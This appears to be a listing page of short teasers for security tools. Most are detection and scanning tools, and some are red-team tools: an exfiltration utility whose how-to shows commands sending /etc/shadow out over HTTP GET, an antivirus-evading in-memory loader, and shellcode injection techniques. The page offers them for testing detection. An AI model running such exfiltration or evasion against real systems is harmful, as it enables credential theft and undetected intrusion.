Emotet detection tool for Windows OS. How to use Download EmoCheck from the Releases page. Run EmoCheck on the host. Check the exported report. Download Please download from the Releases page. Command options (since v0.0.2) Specify output directory for the report (default: current directory) /output [your output directory] or -output [your output directory] No consoleRead More
Data exfiltration utility for testing detection capabilities Description Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only. Exfiltration How-To /etc/shadow -> HTTP GET requests Server # ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETServer -lp 80 -o output.log Client $ ./exfilkit-cli.py -m exfilkit.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r /etc/shadow -> HTTPRead More
KubeClarity is a tool for detection and management of Software Bill Of Materials (SBOM) and vulnerabilities of container images and filesystems. It scans both runtime K8s clusters and CI/CD pipelines for enhanced software supply chain security. SBOM & vulnerability detection challenges Effective vulnerability scanning requires an accurate Software Bill Of Materials (SBOM) detection: Various programmingRead More
Standalone SIGMA-based detection tool for EVTX, Auditd, Sysmon for linux or JSONL/NDJSON Logs Zircolite is a standalone tool written in Python 3. It allows to use SIGMA rules on MS Windows EVTX (EVTX and JSONL format), Auditd logs and Sysmon for Linux logs Zircolite can be used directly on the investigated endpoint (use releases) orRead More
Cloak is a pluggable transport that enhances traditional proxy tools like OpenVPN to evade sophisticated censorship and data discrimination. Cloak is not a standalone proxy program. Rather, it works by masquerading proxied traffic as normal web browsing activities. In contrast to traditional tools which have very prominent traffic fingerprints and can be blocked by simpleRead More
What is openSquat openSquat is an opensource Intelligence (OSINT) security tool to identify cyber squatting threats to specific companies or domains, such as: Phishing campaigns Domain squatting Typo squatting Bitsquatting IDN homograph attacks Doppenganger domains Other brand/domain related scams It does support some key features such as: Automatic newly registered domain updating (once a day)Read More
red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions and it has beenRead More
VECTR documentation can be found here: https://docs.vectr.io VECTR Community Discord Channel: https://discord.gg/2FRd8zf728 VECTR is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios. VECTR provides the ability to create assessment groups, which consist of a collection of Campaigns and supporting TestRead More
中文版本(Chinese version) About DongTai IAST DongTai IAST is an open-source passive interactive security testing (IAST) product. It uses dynamic hooks and taint tracking algorithms to achieve universal vulnerability detection and multiples request associated with vulnerability detection (including but not limited to unauthorized vulnerabilities, overpower vulnerabilities), Third-party component vulnerability detection, etc. Currently, applications in Java andRead More
This project is a simple collection of various shell code injection techniques, aiming to streamline the process of endpoint detection evaluation, beside challenging myself to get into Golang world. Installation 1 – Requires go installed. 2 – Build the application from the project’s directory: go build. Set GOOS=windows if the build system is not Windows.Read More
